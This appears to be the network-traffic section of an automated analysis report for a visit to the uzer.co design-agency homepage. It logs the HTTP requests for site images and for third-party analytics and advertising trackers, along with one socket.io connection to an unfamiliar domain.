Source: global trafficHTTP traffic detected: GET /signals/config/524515998044999?v=2.9.168&r=stable&domain=uzer.co&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /c/hotjar-3513970.js?sv=6 HTTP/1.1Host: static.hotjar.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js/forms.js HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-05.svg HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/clutch-logo-footer.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/ico-procesos-cta.svg HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/separador-dato1.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/separador-dato2.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/css/style.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/design-thinking-home.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/design-sprints-home.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-home-2024.png HTTP/1.1Host: uzer.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /v2/22144436/banner.js HTTP/1.1Host: js.hs-banner.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /analytics/1727397000000/22144436.js HTTP/1.1Host: js.hs-analytics.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /collectedforms.js HTTP/1.1Host: js.hscollectedforms.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://uzer.cosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/lean-ux-home.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/verificado-clutch.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/viewthroughconversion/10981864615/?random=1727397050580&cv=11&fst=1727397050580&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4 HTTP/1.1Host: googleads.g.doubleclick.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkdooA9d_7Vv7YoOPbozbfoeDXEzF2TNjvf5vtmLgh5xQ31N3nMikuKj0A2
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/10981864615/?random=1727397050580&cv=11&fst=1727395200000&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfeCo48tlvcBiKoAf0e5loiGHZn0j2rU38ipI5fWJ5DylbVIzW&random=1253474526&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D524515998044999%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fuzer.co%252F%26rl%3D%26if%3Dfalse%26ts%3D1727397052891%26sw%3D1280%26sh%3D1024%26v%3D2.9.168%26r%3Dstable%26ec%3D0%26o%3D4126%26fbp%3Dfb.1.1727397052883.717417846250247157%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727397049848%26coo%3Dfalse%26exp%3Df1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /signals/config/524515998044999?v=2.9.168&r=stable&domain=uzer.co&hme=3ba426d944c98eb3ce406a0f93fc097d0320a486b65b445a33b2eda3a5aa3429&ex_m=70%2C119%2C105%2C109%2C61%2C4%2C98%2C69%2C16%2C95%2C87%2C51%2C54%2C170%2C173%2C185%2C181%2C182%2C184%2C29%2C99%2C53%2C76%2C183%2C165%2C168%2C178%2C179%2C186%2C129%2C41%2C34%2C141%2C15%2C50%2C192%2C191%2C131%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C91%2C17%2C14%2C94%2C90%2C89%2C106%2C52%2C108%2C39%2C107%2C30%2C92%2C26%2C166%2C169%2C138%2C28%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C74%2C100%2C27%2C75%2C9%2C8%2C79%2C48%2C21%2C102%2C101%2C103%2C96%2C10%2C20%2C3%2C38%2C19%2C84%2C56%2C82%2C33%2C73%2C0%2C93%2C32%2C81%2C86%2C47%2C46%2C85%2C37%2C5%2C88%2C80%2C44%2C35%2C83%2C2%2C36%2C63%2C42%2C104%2C45%2C78%2C68%2C110%2C60%2C59%2C31%2C97%2C58%2C55%2C49%2C77%2C72%2C24%2C111 HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-blog-02.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /socket.io/?EIO=4&transport=polling&t=P8mupdg&sid=yXWikhQOZczjci5kAHuJ HTTP/1.1Host: qdjtq.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /modules.0721e7cf944cf9d78a0b.js HTTP/1.1Host: script.hotjar.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/imagen-blog-03.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /privacy_sandbox/pixel/register/trigger/?id=524515998044999&ev=PageView&dl=https%3A%2F%2Fuzer.co%2F&rl=&if=false&ts=1727397052891&sw=1280&sh=1024&v=2.9.168&r=stable&ec=0&o=4126&fbp=fb.1.1727397052883.717417846250247157&ler=empty&cdl=API_unavailable&it=1727397049848&coo=false&exp=f1&rqm=FGET HTTP/1.1Host: www.facebook.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAttribution-Reporting-Eligible: not-navigation-source, trigger, event-sourceReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /collected-forms/v1/config/json?portalId=22144436&utk= HTTP/1.1Host: forms.hscollectedforms.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/plain, */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://uzer.coSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /collectedforms.js HTTP/1.1Host: js.hscollectedforms.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /analytics/1727397000000/22144436.js HTTP/1.1Host: js.hs-analytics.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /v2/22144436/banner.js HTTP/1.1Host: js.hs-banner.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/logos-clientes1.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/imagen-blog-01.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/logos-clientes2.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /tr/?batch=1&events[0]=id%3D524515998044999%26ev%3DPageView%26dl%3Dhttps%253A%252F%252Fuzer.co%252F%26rl%3D%26if%3Dfalse%26ts%3D1727397052891%26sw%3D1280%26sh%3D1024%26v%3D2.9.168%26r%3Dstable%26ec%3D0%26o%3D4126%26fbp%3Dfb.1.1727397052883.717417846250247157%26ler%3Dempty%26cdl%3DAPI_unavailable%26it%3D1727397049848%26coo%3Dfalse%26exp%3Df1&rqm=GET HTTP/1.1Host: www.facebook.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/10981864615/?random=1727397050580&cv=11&fst=1727395200000&bg=ffffff&guid=ON&async=1&gtm=45je49p0v867598331za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101671035~101747727&u_w=1280&u_h=1024&url=https%3A%2F%2Fuzer.co%2F&hn=www.googleadservices.com&frm=0&tiba=UZER%20-%20Agencia%20de%20Consultor%C3%ADa%20y%20Dise%C3%B1o%20UX%20%2F%20UI&npa=0&pscdl=noapi&auid=1494440894.1727397051&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfeCo48tlvcBiKoAf0e5loiGHZn0j2rU38ipI5fWJ5DylbVIzW&random=1253474526&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIlKHLAQj6mM0BCIWgzQEIucrNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /images/port1-m.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/port2-m.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /images/port4-m.png HTTP/1.1Host: uzer.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _ga_94GBDVKM3R=GS1.1.1727397050.1.0.1727397050.60.0.0; _ga=GA1.1.228618068.1727397051; _gcl_au=1.1.1494440894.1727397051
Source: global trafficHTTP traffic detected: GET /embed/v3/counters.gif?key=collected-forms-embed-js-form-bind&count=1 HTTP/1.1Host: forms.hsforms.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://uzer.co/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
